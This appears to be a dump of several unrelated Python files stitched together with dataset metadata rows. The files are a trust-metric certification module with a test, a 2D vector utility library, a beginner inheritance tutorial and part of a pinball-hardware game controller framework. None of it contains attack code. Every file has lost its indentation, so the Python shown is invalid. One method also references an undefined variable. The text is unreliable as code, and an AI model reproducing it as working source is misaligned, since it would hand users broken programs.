self._certs_by_subj.set_filename("users/"+str(name)+"/certs.subj")
self._certs_by_issuer.set_filename("users/"+str(name)+"/certs.issuer")
# overload meaning of FileCertifications here to store user-profile.
self.info = FileCertifications()
self.info.set_filename("users/"+str(name)+"/profile")
def set_filename(self, file):
self.info.set_filename(file)
def info_keys(self):
return self.info.cert_keys()
def infos_by_type(self, type):
return self.info.certs_by_type(type)
def info_type_keys(self, type, name):
return self.info.certs_type_keys(type, name)
def add(self, type, name, level):
self.info.add(type, name, level)
def remove(self, type, name):
self.info.remove(type, name, level)
def info_index(self, type, name):
return self.info.cert_level(type, name)
class FileCertInfo(CertInfo):
""" This is probably some of the clumsiest code ever written.
overload DictCertification - because it's been a really
good, lazy weekend, to store an unordered list (seeds),
an ordered list (levels) etc.
yuck. please, someone shoot me or do a better job,
_esp._ for example code.
"""
def cert_seeds(self, idxn):
d = FileCertifications()
d.set_filename("certs/"+str(idxn))
# clumsy usage of a dictionary as an unordered list. argh.
d = d.certs_by_type("seeds")
return d.keys()
def cert_levels(self, idxn):
d = FileCertifications()
d.set_filename("certs/"+str(idxn))
dict = d.certs_by_type("levels")
# clumsy usage of a dictionary into an ordered list. argh.
keys = dict.keys()
l = [None] * len(keys)
for idx in keys:
l[int(idx)] = dict[idx]
return l
def cert_level_default(self, idxn):
d = FileCertifications()
d.set_filename("certs/"+str(idxn))
[d] = d.certs_by_type("default level").keys()
return d
def cert_level_min(self, idxn):
d = FileCertifications()
d.set_filename("certs/"+str(idxn))
[d] = d.certs_by_type("min level").keys()
return d
def cert_tmetric_type(self, idxn):
d = FileCertifications()
d.set_filename("certs/"+str(idxn))
[d] = d.certs_by_type("type").keys()
return d
def add_cert_seed(self, idxn, seed):
d = FileCertifications()
d.set_filename("certs/"+str(idxn))
# clumsy usage of a dictionary as an unordered list. argh.
return d.add("seeds", seed, None)
def add_cert_level(self, idxn, level, index):
d = FileCertifications()
d.set_filename("certs/"+str(idxn))
# clumsy usage of a dictionary as an index-ordered list. argh.
return d.add("levels", index, level)
def set_cert_level_default(self, idxn, dflt_level):
d = FileCertifications()
d.set_filename("certs/"+str(idxn))
return d.add("default level", dflt_level, None)
def set_cert_level_min(self, idxn, min_level):
d = FileCertifications()
d.set_filename("certs/"+str(idxn))
return d.add("min level", min_level, None)
def set_cert_tmetric_type(self, idxn, type):
d = FileCertifications()
d.set_filename("certs/"+str(idxn))
return d.add("type", type, None)
def test():
from profile import Profiles
from tm_calc import PymTrustMetric
from pprint import pprint
f = FileCertInfo()
f.add_cert_seed('like', '55')
f.add_cert_seed('like', 'luke')
f.add_cert_level('like', 'none', 0)
f.add_cert_level('like', "don't care", 1)
f.add_cert_level('like', 'good', 2)
f.add_cert_level('like', 'best', 3)
f.set_cert_level_default('like', "don't care")
f.set_cert_level_min('like', 'none')
f.set_cert_tmetric_type('like', 'to')
f.add_cert_seed('hate', 'heather')
f.add_cert_seed('hate', '10')
f.add_cert_level('hate', 'none', 0)
f.add_cert_level('hate', "don't care", 1)
f.add_cert_level('hate', 'dislike', 2)
f.add_cert_level('hate', 'looks CAN kill', 3)
f.set_cert_level_default('hate', "don't care")
f.set_cert_level_min('hate', 'none')
f.set_cert_tmetric_type('hate', 'to')
p = Profiles(FileProfile, FileCertifications)
r = p.add_profile('luke')
r.add("name", 0, "luke")
r.add("name", 1, "kenneth")
r.add("name", 2, "casson")
r.add("name", 3, "leighton")
r.add("info", 0, "likes python a lot - thinks it's really cool")
r.add("info", 1, "groks network traffic like he has a built-in headsocket")
p.add_profile('heather')
p.add_profile('bob')
p.add_profile('mary')
p.add_profile('lesser fleas')
p.add_profile('little fleas')
p.add_profile('fleas')
p.add_profile('robbie the old crock pony')
p.add_profile('tart the flat-faced persian cat')
p.add_profile('mo the mad orange pony')
p.add_profile('55')
p.add_profile('10')
p.add_profile('2')
p.add_profile('fleas ad infinitum')
p.add_cert('luke', 'like', 'heather', 'best')
p.add_cert('heather', 'like', 'luke', 'best')
p.add_cert('heather', 'like', 'robbie the old crock pony', 'best')
p.add_cert('heather', 'like', 'tart the flat-faced persian cat', 'best')
p.add_cert('heather', 'like', 'mo the mad orange pony', 'best' )
p.add_cert('bob', 'like', 'mary', 'good')
p.add_cert('bob', 'like', 'heather', 'good')
p.add_cert('mary', 'like', 'bob', 'good')
p.add_cert('fleas', 'like', 'little fleas', 'good')
p.add_cert('little fleas', 'like', 'lesser fleas', 'best')
p.add_cert('lesser fleas', 'like', 'fleas ad infinitum', 'best')
p.add_cert('robbie the old crock pony', 'like', 'fleas', 'best')
p.add_cert('55', 'like', '10', 'none')
p.add_cert('10', 'like', '2', 'best')
p.add_cert('heather', 'hate', 'bob', 'dislike' )
p.add_cert('heather', 'hate', 'fleas', 'looks CAN kill' )
p.add_cert('fleas', 'hate', 'mary', 'dislike')
p.add_cert('10', 'hate', '55', 'looks CAN kill')
t = PymTrustMetric(f, p)
r = t.tmetric_calc('like')
pprint(r)
r = t.tmetric_calc('like', ['heather'])
pprint(r)
r = t.tmetric_calc('hate')
pprint(r)
if __name__ == '__main__':
test()
| gpl-2.0 | -2,231,080,821,749,822,500 | 27.943452 | 77 | 0.668072 | false |
natduca/ndbg | util/vec2.py | 1 | 3522 | # Copyright 2011 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import math
class vec2(object):
def __init__(self, opt_a=None,opt_b=None):
if opt_a != None and opt_b != None:
self.x = float(opt_a)
self.y = float(opt_b)
elif opt_a != None:
self.x = float(opt_a.x)
self.y = float(opt_a.y)
else:
self.x = 0
self.y = 0
def set(self,a,opt_b=None):
if opt_b != None:
self.x = float(a)
self.y = float(opt_b)
else:
self.x = float(a.x)
self.y = float(a.y)
def __str__(self):
return "(%f,%f)" % (self.x,self.y)
def vec2_add(a,b):
dst = vec2()
dst.x = a.x + b.x
dst.y = a.y + b.y
return dst
def vec2_accum(a,b):
a.x += b.x
a.y += b.y
return a
def vec2_sub(a,b):
dst = vec2()
dst.x = a.x - b.x
dst.y = a.y - b.y
return dst
def vec2_neg_accum(a,b):
a.x -= b.x
a.y -= b.y
return a
def vec2_scale(a,scale):
dst = vec2()
dst.x = a.x * scale
dst.y = a.y * scale
return dst
def vec2_scale_inplace(a,scale):
a.x *= scale
a.y *= scale
return a
def vec2_piecewise_mul(a,b):
dst = vec2()
dst.x = a.x * b.x
dst.y = a.y * b.y
return dst
def vec2_piecewise_div(a,b):
dst = vec2()
dst.x = a.x / b.x
dst.y = a.y / b.y
return dst
def vec2_dot(a,b):
return a.x * b.x + a.y * b.y
def vec2_length(a):
return math.sqrt(vec2_dot(a,a))
def vec2_length_sqared(a):
return vec2_dot(a,a)
def vec2_normalize(a):
s = 1/vec2_length(a)
return vec2_scale(a,s)
def vec2_normalize_inplace(dst):
s = 1/vec2_length(dst)
dst.x *= s
dst.y *= s
return dst
def vec2_interp(a,b,factor):
delta = vec2_sub(b,a)
vec2_scale_inplace(delta,factor)
vec2_accum(delta,a)
return delta
def vec2_distance(a,b):
return vec2_length(vec2_sub(b,a))
class rect(object):
def __init__(self,opt_a=None,opt_b=None,centered=False):
if opt_a and opt_b:
self.pos = vec2(opt_a)
self.size = vec2(opt_b)
elif opt_a == None and opt_b == None:
self.pos = vec2(0,0)
self.size = vec2(0,0)
else:
raise Exception("Need two args or none")
if centered:
hsize = vec2_scale(self.size,0.5)
self.pos = vec2_sub(self.pos,hsize)
def contains(self,v):
return v.x >= self.pos.x and v.x < self.pos.x + self.size.x and v.y >= self.pos.y and v.y < self.pos.y + self.size.y
###########################################################################
class ivec2(object):
def __init__(self, opt_a=None,opt_b=None):
if opt_a != None and opt_b != None:
self.x = int(opt_a)
self.y = int(opt_b)
elif opt_a != None:
self.x = int(opt_a.x)
self.y = int(opt_a.y)
else:
self.x = 0
self.y = 0
def set(self,a,opt_b=None):
if opt_b != None:
self.x = int(a)
self.y = int(opt_b)
else:
self.x = int(a.x)
self.y = int(a.y)
def __str__(self):
return "(%i,%i)" % (self.x,self.y)
| apache-2.0 | 5,074,446,273,003,439,000 | 20.47561 | 121 | 0.561045 | false |
KT26/PythonCourse | 8. Class/8.py | 1 | 1268 | # Created by PyCharm Pro Edition
# User: Kaushik Talukdar
# Date: 24-04-17
# Time: 12:29 AM
# INHERITANCE
# We can create a new class, but instead of writing it from scratch, we can base it on an existing class.
# Lets understand inheritance better with an example
class Car():
def __init__(self, make, model, year):
self.make = make
self.model = model
self.year = year
self.mileage = 0
def get_descriptive_name(self):
full_name = self.make.title() + ' ' + self.model.title() + ' ' + str(self.year)
return full_name
def update_odometer(self, mileage):
self.mileage = mileage
# the class below is an inherited class derived from Cars and have access to Car's variables as well as methods
# The parent class name must appear in parenthesis in child class for Inheritance to work
# the super() method is responsible for providing the child class with all the variables and methods of parent class
class ElectricCar(Car):
def __init__(self, make, model, year):
super().__init__(make, model, year)
my_car = ElectricCar('Tesla', 'Model S', '2017')
car = my_car.get_descriptive_name()
print(car)
| mit | -6,550,018,117,725,046,000 | 31.368421 | 116 | 0.630126 | false |
mjocean/PyProcGameHD-SkeletonGame | procgame/game/game.py | 1 | 34216 | import os
import sys
import pinproc
import Queue
import yaml
import time
import copy
import logging
from procgame import config
from gameitems import *
from procgame import util
from mode import *
from pdb import PDBConfig, LED
from procgame import LEDs
def config_named(name):
if not os.path.isfile(name): # If we cannot find this file easily, try searching the config_path:
config_paths = config.value_for_key_path('config_path', ['.'])
if issubclass(type(config_paths), str):
config_paths = [config_paths]
found_path = util.find_file_in_path(name, config_paths)
if found_path:
name = found_path
else:
return None
return yaml.load(open(name, 'r'))
class GameController(object):
"""Core object representing the game itself.
Usually a game developer will create a new game by subclassing this class.
Consider subclassing :class:`BasicGame` instead, as it makes use of several helpful modes
and controllers.
"""
machine_type = None
"""Machine type used to configure :attr:`proc` in this class's initializer."""
proc = None
"""A :class:`pinproc.PinPROC` instance, created in the initializer with machine type :attr:`machine_type`."""
modes = None
"""An instance of :class:`ModeQueue`, which manages the presently active modes."""
coils = AttrCollection("drivers")
"""An :class:`AttrCollection` of :class:`Driver` objects. Populated by :meth:`load_config`."""
lamps = AttrCollection("lamps")
"""An :class:`AttrCollection` of :class:`Driver` objects. Populated by :meth:`load_config`."""
switches = AttrCollection("switches")
"""An :class:`AttrCollection` of :class:`Switch` objects. Populated by :meth:`load_config`."""
leds = AttrCollection("leds")
"""An :class:`AttrCollection` of :class:`LED` objects. Populated by :meth:`load_config`."""
ball = 0
"""The number of the current ball. A value of 1 represents the first ball; 0 indicates game over."""
players = []
"""Collection of :class:`Player` objects."""
old_players = []
"""Copy of :attr:`players` made when :meth:`reset` is called."""
current_player_index = 0
"""Index in :attr:`players` of the current player."""
t0 = None
"""Start :class:`time.time` of the game program. I.e., the time of power-up."""
config = None
"""YAML game configuration loaded by :meth:`load_config`."""
balls_per_game = 3
"""Number of balls per game."""
game_data = {}
"""Contains high score and audit information. That is, transient information specific to one game installation."""
user_settings = {}
"""Contains local game configuration, such as the volume."""
logger = None
""":class:`Logger` object instance; instantiated in :meth:`__init__` with the logger name "game"."""
# MJO: Virtual DMD w/o h/w DMD
frames_per_second = 30
"""Setting this to true in the config.yaml enables a virtual DMD without physical DMD events going to the PROC"""
LEDs = None
def __init__(self, machine_type):
super(GameController, self).__init__()
self.logger = logging.getLogger('game')
self.machine_type = pinproc.normalize_machine_type(machine_type)
self.proc = self.create_pinproc()
self.proc.reset(1)
self.modes = ModeQueue(self)
self.t0 = time.time()
self.LEDs = LEDs.LEDcontroller(self)
self.dmd_updates = 0
def create_pinproc(self):
"""Instantiates and returns the class to use as the P-ROC device.
This method is called by :class:`GameController`'s init method to populate :attr:`proc`.
Checks :mod:`~procgame.config` for the key path ``pinproc_class``.
If that key path exists the string is used as the fully qualified class name
to instantiate. The class is then instantiated with one initializer argument,
:attr:`machine_type`.
If that key path does not exist then this method returns an instance of :class:`pinproc.PinPROC`.
"""
self.frames_per_second = config.value_for_key_path('dmd_framerate', 30)
klass_name = config.value_for_key_path('pinproc_class', 'pinproc.PinPROC')
klass = util.get_class(klass_name)
return klass(self.machine_type)
def create_player(self, name):
"""Instantiates and returns a new instance of the :class:`Player` class with the
name *name*.
This method is called by :meth:`add_player`.
This can be used to supply a custom subclass of :class:`Player`.
"""
return Player(name)
def __enter__(self):
pass
def __exit__(self):
del self.proc
def reset(self):
"""Reset the game state as a slam tilt might."""
self.ball = 0
self.old_players = []
self.old_players = self.players[:]
self.players = []
self.current_player_index = 0
self.modes.modes = []
def current_player(self):
"""Returns the current :class:`Player` as described by :attr:`current_player_index`."""
if len(self.players) > self.current_player_index:
return self.players[self.current_player_index]
else:
return None
def add_player(self):
"""Adds a new player to :attr:`players` and assigns it an appropriate name."""
player = self.create_player('Player %d' % (len(self.players) + 1))
self.players += [player]
return player
def get_ball_time(self):
return self.ball_end_time - self.ball_start_time
def get_game_time(self, player):
return self.players[player].game_time
def save_ball_start_time(self):
self.ball_start_time = time.time()
def start_ball(self):
"""Called by the implementor to notify the game that (usually the first) ball should be started."""
self.ball_starting()
def ball_starting(self):
"""Called by the game framework when a new ball is starting."""
self.save_ball_start_time()
def shoot_again(self):
"""Called by the game framework when a new ball is starting which was the result of a stored extra ball (Player.extra_balls).
The default implementation calls ball_starting(), which is not called by the framework in this case."""
self.ball_starting()
def ball_ended(self):
"""Called by the game framework when the current ball has ended."""
pass
def end_ball(self):
"""Called by the implementor to notify the game that the current ball has ended."""
self.ball_end_time = time.time()
# Calculate ball time and save it because the start time
# gets overwritten when the next ball starts.
self.ball_time = self.get_ball_time()
self.current_player().game_time += self.ball_time
self.ball_ended()
if self.current_player().extra_balls > 0:
self.current_player().extra_balls -= 1
self.shoot_again()
return
if self.current_player_index + 1 == len(self.players):
self.ball += 1
self.current_player_index = 0
else:
self.current_player_index += 1
if self.ball > self.balls_per_game:
self.end_game()
else:
self.start_ball() # Consider: Do we want to call this here, or should it be called by the game? (for bonus sequence)
def game_started(self):
"""Called by the GameController when a new game is starting."""
self.ball = 1
self.players = []
self.current_player_index = 0
def start_game(self):
"""Called by the implementor to notify the game that the game has started."""
self.game_started()
def game_ended(self):
"""Called by the GameController when the current game has ended."""
pass
def end_game(self):
"""Called by the implementor to mark notify the game that the game has ended."""
self.ball = 0
self.game_ended()
def is_game_over(self):
"""Returns `True` if the game is in game over. A game is in game over if :attr:`ball` is 0."""
return self.ball == 0
def dmd_event(self):
"""Called by the GameController when a DMD event has been received."""
pass
def tick(self):
"""Called by the GameController once per run loop."""
pass
def load_config(self, filename):
"""Reads the YAML machine configuration file into memory.
Configures the switches, lamps, and coils members.
Enables notifyHost for the open and closed debounced states on each configured switch.
"""
self.logger.info('Loading machine configuration from "%s"...', filename)
self.config = config_named(filename)
if not self.config:
raise ValueError, 'load_config(filename="%s") could not be found. Did you set config_path?' % (filename)
self.process_config()
def load_config_stream(self, stream):
"""Reads the YAML machine configuration in stream form (string or opened file) into memory.
Configures the switches, lamps, and coils members.
Enables notifyHost for the open and closed debounced states on each configured switch.
"""
self.config = yaml.load(stream)
if not self.config:
raise ValueError, 'load_config_stream() could not load configuration. Malformed YAML?'
self.process_config()
def process_config(self):
"""Called by :meth:`load_config` and :meth:`load_config_stream` to process the values in :attr:`config`."""
pairs = [('PRCoils', self.coils, Driver),
('PRLamps', self.lamps, Driver),
('PRSwitches', self.switches, Switch),
('PRLEDs', self.leds, LED) ]
new_virtual_drivers = []
polarity = self.machine_type == pinproc.MachineTypeSternWhitestar or self.machine_type == pinproc.MachineTypeSternSAM or self.machine_type == pinproc.MachineTypePDB
# Because PDBs can be configured in many different ways, we need to traverse
# the YAML settings to see how many PDBs are being used. Then we can configure
# the P-ROC appropriately to use those PDBs. Only then can we relate the YAML
# coil/lamp #'s to P-ROC numbers for the collections.
if self.machine_type == pinproc.MachineTypePDB:
pdb_config = PDBConfig(self.proc, self.config)
for section, collection, klass in pairs:
if section in self.config:
sect_dict = self.config[section]
for name in sect_dict:
item_dict = sect_dict[name]
# Find the P-ROC number for each item in the YAML sections. For PDB's
# the number is based on the PDB configuration determined above. For
# other machine types, pinproc's decode() method can provide the number.
if self.machine_type == pinproc.MachineTypePDB:
number = pdb_config.get_proc_number(section, str(item_dict['number']))
if number == -1:
self.logger.error('%s Item: %s cannot be controlled by the P-ROC. Ignoring...', section, name)
continue
else:
number = pinproc.decode(self.machine_type, str(item_dict['number']))
item = None
if ('bus' in item_dict and item_dict['bus'] == 'AuxPort') or number >= pinproc.DriverCount:
item = VirtualDriver(self, name, number, polarity)
new_virtual_drivers += [number]
else:
yaml_number = str(item_dict['number'])
if klass==LED:
number = yaml_number
item = klass(self, name, number)
item.yaml_number = yaml_number
if 'label' in item_dict:
item.label = item_dict['label']
if 'type' in item_dict:
item.type = item_dict['type']
if 'tags' in item_dict:
tags = item_dict['tags']
if type(tags) == str:
item.tags = tags.split(',')
elif type(tags) == list:
item.tags = tags
else:
self.logger.warning('Configuration item named "%s" has unexpected tags type %s. Should be list or comma-delimited string.' % (name, type(tags)))
if klass==Switch:
if (('debounce' in item_dict and item_dict['debounce'] == False) or number >= pinproc.SwitchNeverDebounceFirst):
item.debounce = False
if klass==Driver:
if ('pulseTime' in item_dict):
item.default_pulse_time = item_dict['pulseTime']
if ('polarity' in item_dict):
item.reconfigure(item_dict['polarity'])
if klass==LED:
if ('polarity' in item_dict):
item.invert = not item_dict['polarity']
collection.add(name, item)
# In the P-ROC, VirtualDrivers will conflict with regular drivers on the same group.
# So if any VirtualDrivers were added, the regular drivers in that group must be changed
# to VirtualDrivers as well.
for virtual_driver in new_virtual_drivers:
base_group_number = virtual_driver/8
for collection in [self.coils, self.lamps]:
items_to_remove = []
for item in collection:
if item.number/8 == base_group_number:
items_to_remove += [{name:item.name,number:item.number}]
for item in items_to_remove:
self.logger.info( "Removing %s from %s" , item[name],str(collection))
collection.remove(item[name], item[number])
self.logger.info("Adding %s to VirtualDrivers",item[name])
collection.add(item[name], VirtualDriver(self, item[name], item[number], polarity))
if 'PRBallSave' in self.config:
sect_dict = self.config['PRBallSave']
self.ballsearch_coils = sect_dict['pulseCoils']
self.ballsearch_stopSwitches = sect_dict['stopSwitches']
self.ballsearch_resetSwitches = sect_dict['resetSwitches']
# We want to receive events for all of the defined switches:
self.logger.info("Programming switch rules...")
for switch in self.switches:
if switch.debounce:
self.proc.switch_update_rule(switch.number, 'closed_debounced', {'notifyHost':True, 'reloadActive':False}, [], False)
self.proc.switch_update_rule(switch.number, 'open_debounced', {'notifyHost':True, 'reloadActive':False}, [], False)
else:
self.proc.switch_update_rule(switch.number, 'closed_nondebounced', {'notifyHost':True, 'reloadActive':False}, [], False)
self.proc.switch_update_rule(switch.number, 'open_nondebounced', {'notifyHost':True, 'reloadActive':False}, [], False)
# Configure the initial switch states:
states = self.proc.switch_get_states()
for sw in self.switches:
sw.set_state(states[sw.number] == 1)
sect_dict = self.config['PRGame']
self.num_balls_total = sect_dict['numBalls']
self.logger.info("LEDS...")
for led in self.leds:
self.logger.info(" LED name=%s; number=%s" % (led.name,led.yaml_number))
def load_settings(self, template_filename, user_filename):
"""Loads the YAML game settings configuration file. The game settings
describe operator configuration options, such as balls per game and
replay levels.
The *template_filename* provides default values for the game;
*user_filename* contains the values set by the user.
See also: :meth:`save_settings`
"""
settings_changed = False
self.user_settings = {}
self.settings = yaml.load(open(template_filename, 'r'))
if os.path.exists(user_filename):
self.user_settings = yaml.load(open(user_filename, 'r'))
# this pass ensures the user settings include everything in the
# game settings by assigning defaults for anything missing
for section in self.settings:
for item in self.settings[section]:
if not section in self.user_settings:
self.user_settings[section] = {}
settings_changed = True
if not item in self.user_settings[section]:
settings_changed = True
self.logger.error("Missing setting in user settings file; will be replaced with default:\n%s:{%s}\n-------" % (section,item))
if 'default' in self.settings[section][item]:
self.user_settings[section][item] = self.settings[section][item]['default']
else:
self.user_settings[section][item] = self.settings[section][item]['options'][0]
else:
if 'increments' not in self.settings[section][item]:
if(self.user_settings[section][item] not in self.settings[section][item]['options']):
settings_changed = True
self.logger.error("Invalid value found in user settings file; will be replaced with default:\n%s:{%s}\n-------" % (section,item))
if 'default' in self.settings[section][item]:
self.user_settings[section][item] = self.settings[section][item]['default']
else:
self.user_settings[section][item] = self.settings[section][item]['options'][0]
# this pass logs settings that occur in the user settings
# but not in game settings and removes them
invalid_sections = []
for section in self.user_settings:
if(section not in self.settings):
settings_changed = True
self.logger.error("Deprecated section found in user settings file; will be removed:\n%s\n-------" % section)
invalid_sections.append(section)
else:
invalid_items = []
for item in self.user_settings[section]:
if item not in self.settings[section]:
settings_changed = True
self.logger.error("Deprecated setting found in user settings file; will be removed:\n%s:{%s}\n-------" % (section, item))
invalid_items.append(item)
for item in invalid_items:
self.user_settings[section].pop(item)
for section in invalid_sections:
self.user_settings.pop(section)
return settings_changed
def save_settings(self, filename):
"""Writes the game settings to *filename*. See :meth:`load_settings`."""
if os.path.exists(filename):
if os.path.exists(filename+'.bak'):
os.remove(filename+'.bak')
os.rename(filename, filename+'.bak')
if os.path.exists(filename):
os.remove(filename)
stream = open(filename, 'w')
yaml.dump(self.user_settings, stream)
file.close(stream)
if os.path.getsize(filename) == 0:
self.logger.error( " ****** CORRUPT GAME USER SETTINGS FILE REPLACING WITH CLEAN DATA --- restoring last copy ****************")
#remove bad file
os.remove(filename)
os.rename(filename+'.bak', filename)
else:
self.logger.info("Settings saved to " + str(filename))
def load_game_data(self, template_filename, user_filename):
"""Loads the YAML game data configuration file. This file contains
transient information such as audits, high scores and other statistics.
The *template_filename* provides default values for the game;
*user_filename* contains the values set by the user.
See also: :meth:`save_game_data`
"""
self.game_data = {}
template_file = open(template_filename,'r')
template = yaml.load(template_file)
file.close(template_file)
if os.path.exists(user_filename):
if os.path.getsize(user_filename) == 0:
self.logger.error( " **************** CORRUPT DATA FILE REPLACING WITH CLEAN DATA --- ****************")
os.remove(user_filename)
os.rename(user_filename+'.bak', user_filename)
user_filename_file = open(user_filename, 'r')
self.game_data = yaml.load(user_filename_file)
file.close(user_filename_file)
if template:
for key, value in template.iteritems():
if key not in self.game_data:
self.game_data[key] = copy.deepcopy(value)
def save_game_data(self, filename):
"""Writes the game data to *filename*. See :meth:`load_game_data`."""
if os.path.exists(filename):
if os.path.exists(filename+'.bak'):
os.remove(filename+'.bak')
os.rename(filename, filename+'.bak')
stream = open(filename, 'w')
yaml.dump(self.game_data, stream)
file.close(stream)
#now check for successful write, if not restore backup file
if os.path.getsize(filename) == 0:
self.logger.info( " **************** CORRUPT DATA FILE REPLACING WITH CLEAN DATA --- restoring last copy ****************")
#remove bad file
os.remove(filename)
os.rename(filename+'.bak', filename)
def enable_flippers(self, enable):
#return True
"""Enables or disables the flippers AND bumpers."""
for flipper in self.config['PRFlippers']:
self.logger.info("Programming flipper %s", flipper)
main_coil = self.coils[flipper+'Main']
if self.coils.has_key(flipper+'Hold'):
style = 'wpc'
self.logger.info("%sabling WPC style flipper" % ("En" if enable else "Dis"))
hold_coil = self.coils[flipper+'Hold']
else:
self.logger.info("%sabling Stern style flipper" % ("En" if enable else "Dis"))
style = 'stern'
switch_num = self.switches[flipper].number
drivers = []
if enable:
if style == 'wpc':
drivers += [pinproc.driver_state_pulse(main_coil.state(), main_coil.default_pulse_time)]
drivers += [pinproc.driver_state_pulse(hold_coil.state(), 0)]
else:
drivers += [pinproc.driver_state_patter(main_coil.state(), 2, 18, main_coil.default_pulse_time, True)]
self.proc.switch_update_rule(switch_num, 'closed_nondebounced', {'notifyHost':False, 'reloadActive':False}, drivers, len(drivers) > 0)
drivers = []
if enable:
drivers += [pinproc.driver_state_disable(main_coil.state())]
if style == 'wpc':
drivers += [pinproc.driver_state_disable(hold_coil.state())]
self.proc.switch_update_rule(switch_num, 'open_nondebounced', {'notifyHost':False, 'reloadActive':False}, drivers, len(drivers) > 0)
if not enable:
main_coil.disable()
if style == 'wpc':
hold_coil.disable()
# Enable the flipper relay on wpcAlphanumeric machines
if self.machine_type == pinproc.MachineTypeWPCAlphanumeric:
self.enable_alphanumeric_flippers(enable)
self.enable_bumpers(enable)
def enable_alphanumeric_flippers(self, enable):
# 79 corresponds to the circuit on the power/driver board. It will be 79 for all WPCAlphanumeric machines.
self.log("AN Flipper enable in game.py called")
flipperRelayPRNumber = 79
if enable:
self.coils[79].pulse(0)
else:
self.coils[79].disable()
def enable_bumpers(self, enable):
for bumper in self.config['PRBumpers']:
switch_num = self.switches[bumper].number
coil = self.coils[bumper]
drivers = []
if enable:
drivers += [pinproc.driver_state_pulse(coil.state(), coil.default_pulse_time)]
self.proc.switch_update_rule(switch_num, 'closed_nondebounced', {'notifyHost':False, 'reloadActive':True}, drivers, False)
def install_switch_rule_coil_disable(self, switch_num, switch_state, coil_name, notify_host, enable, reload_active = False, drive_coil_now_if_valid=False):
coil = self.coils[coil_name];
drivers = []
if enable:
drivers += [pinproc.driver_state_disable(coil.state())]
self.proc.switch_update_rule(switch_num, switch_state, {'notifyHost':notify_host, 'reloadActive':reload_active}, drivers, drive_coil_now_if_valid)
def install_switch_rule_coil_pulse(self, switch_num, switch_state, coil_name, pulse_duration, notify_host, enable, reload_active = False, drive_coil_now_if_valid=False):
coil = self.coils[coil_name];
drivers = []
if enable:
drivers += [pinproc.driver_state_pulse(coil.state(),pulse_duration)]
self.proc.switch_update_rule(switch_num, switch_state, {'notifyHost':notify_host, 'reloadActive':reload_active}, drivers, drive_coil_now_if_valid)
def install_switch_rule_coil_schedule(self, switch_num, switch_state, coil_name, schedule, schedule_seconds, now, notify_host, enable, reload_active = False, drive_coil_now_if_valid=False):
coil = self.coils[coil_name];
drivers = []
if enable:
drivers += [pinproc.driver_state_schedule(coil.state(),schedule,schedule_seconds,now)]
self.proc.switch_update_rule(switch_num, switch_state, {'notifyHost':notify_host, 'reloadActive':reload_active}, drivers, drive_coil_now_if_valid)
def install_switch_rule_coil_patter(self, switch_num, switch_state, coil_name, milliseconds_on, milliseconds_off, original_on_time, notify_host, enable, reload_active = False, drive_coil_now_if_valid=False):
coil = self.coils[coil_name];
drivers = []
if enable:
drivers += [pinproc.driver_state_patter(coil.state(),milliseconds_on,milliseconds_off,original_on_time, True)]
self.proc.switch_update_rule(switch_num, switch_state, {'notifyHost':notify_host, 'reloadActive':reload_active}, drivers, drive_coil_now_if_valid)
def process_event(self, event):
event_type = event['type']
event_value = event['value']
if event_type == 99: # CTRL-C to quit
print "CTRL-C detected, quiting..."
self.end_run_loop()
elif event_type == pinproc.EventTypeDMDFrameDisplayed: # DMD events
# print "% 10.3f Frame event. Value=%x" % (time.time()-self.t0, event_value)
self.dmd_event()
elif event_type == pinproc.EventTypeBurstSwitchOpen or \
event_type == pinproc.EventTypeBurstSwitchClosed:
self.burst_event(event)
elif event_type == pinproc.EventTypeSwitchClosedDebounced or \
event_type == pinproc.EventTypeSwitchOpenDebounced or \
event_type == pinproc.EventTypeSwitchClosedNondebounced or \
event_type == pinproc.EventTypeSwitchOpenNondebounced:
self.switch_event(event)
else:
self.other_event(event)
def other_event(self, event):
self.logger.warning("Unknown event type received. Type:%d, Value:%s." % (event['type'], event['value']))
def switch_event(self, event):
event_type = event['type']
event_value = event['value']
try:
sw = self.switches[event_value]
if 'time' in event:
sw.hw_timestamp = event['time']
except KeyError:
self.logger.warning("Received switch event but couldn't find switch %s." % event_value)
return
if sw.debounce:
recvd_state = event_type == pinproc.EventTypeSwitchClosedDebounced
else:
recvd_state = event_type == pinproc.EventTypeSwitchClosedNondebounced
if sw.state != recvd_state:
sw.set_state(recvd_state)
self.logger.info("%s:\t%s\t(%s)", sw.name, sw.state_str(),event_type)
self.modes.handle_event(event)
sw.reset_timer()
else:
#self.logger.warning("DUPLICATE STATE RECEIVED, IGNORING: %s:\t%s", sw.name, sw.state_str())
pass
def burst_event(self, event):
pass
def update_lamps(self):
for mode in reversed(self.modes.modes):
mode.update_lamps()
def end_run_loop(self):
"""Called by the programmer when he wants the run_loop to end"""
self.done = True
def log(self, line):
"""Deprecated; use :attr:`logger` to log messages."""
self.logger.info(line)
def get_events(self):
"""Called by :meth:`run_loop` once per cycle to get the events to process during
this cycle of the run loop.
"""
events = []
events.extend(self.proc.get_events())
events.extend(self.get_virtualDMDevents()) # MJO: changed to support fake DMD w/o h/w DMD
return events
def tick_virtual_drivers(self):
for coil in self.coils:
coil.tick()
for lamp in self.lamps:
lamp.tick()
for led in self.leds:
led.tick()
def LED_event(self):
if self.LEDs:
self.LEDs.update()
# MJO: added to support virtual DMD only (i.e., without hardware)
last_dmd_event = 0.0
frames_per_second = 30
rem_frames = 0.0
def get_virtualDMDevents(self):
""" Get all switch and DMD events since the last time this was called. """
events = []
now = time.time()
frame_interval = float(1/float(self.frames_per_second))
seconds_since_last_dmd_event = now - self.last_dmd_event
f_frames_past = float(seconds_since_last_dmd_event / float(frame_interval))
f_full_frames = f_frames_past + float(self.rem_frames)
i_full_frames = int(f_full_frames)
i_full_frames = min(i_full_frames, 16)
missed_dmd_events = i_full_frames
if missed_dmd_events > 0:
self.rem_frames = f_full_frames-i_full_frames
if(missed_dmd_events>1):
pass
# print ("-----")
# print("DMDMDMDMDMD FRAMES PAST (by time): " + str(f_frames_past))
# print("DMDMDMDMDMD rem FRAMES: " + str(self.rem_frames))
# print("DMDMDMDMDMD missed FRAMES: " + str(i_full_frames))
# print("DMDMDMDMDMD CARRY FRAMES: " + str(self.rem_frames))
self.last_dmd_event = now
